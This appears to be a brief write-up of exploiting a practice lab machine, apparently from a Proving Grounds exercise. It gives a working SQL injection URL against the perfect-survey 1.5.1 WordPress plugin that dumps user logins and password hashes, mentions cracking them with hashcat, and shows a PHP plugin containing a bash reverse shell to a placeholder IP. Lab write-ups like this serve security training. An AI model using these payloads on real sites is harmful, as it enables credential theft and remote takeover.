perfect-survey 1.5.1 exploit (CVE-2021-24762)

WPScan

wpscan revealed perfect-survey 1.5.1 was in use.

00wpscan

Exploit (CVE-2021-24762)

It was vulnerable to sql injeciton. All I had to do was to visit below URL with given payload to get users and passwords.

site.com/wp-admin/admin-ajax.php?action=get_question&question_id=1 union select 1,1,char(116,101,120,116),user_login,user_pass,0,0,null,null,null,null,null,null,null,null,null from wp_users

01exploit

Hashcat

I used hashcat with mode 400 and cracked it.

02cracked

RCE

Then I was able to login and get a reverse shell via custom plugin upload.

<?php

/**
* Plugin Name: Wordpress Reverse Shell
* Author: mto

*/

exec("/bin/bash -c 'bash -i >& /dev/tcp/<IP>/22 0>&1'")
?>

05 zip

06test zip

07gg

Nagoya - Proving Grounds Practice

WiFi Mouse 1.8.3.2 exploit (CVE-2022-3218)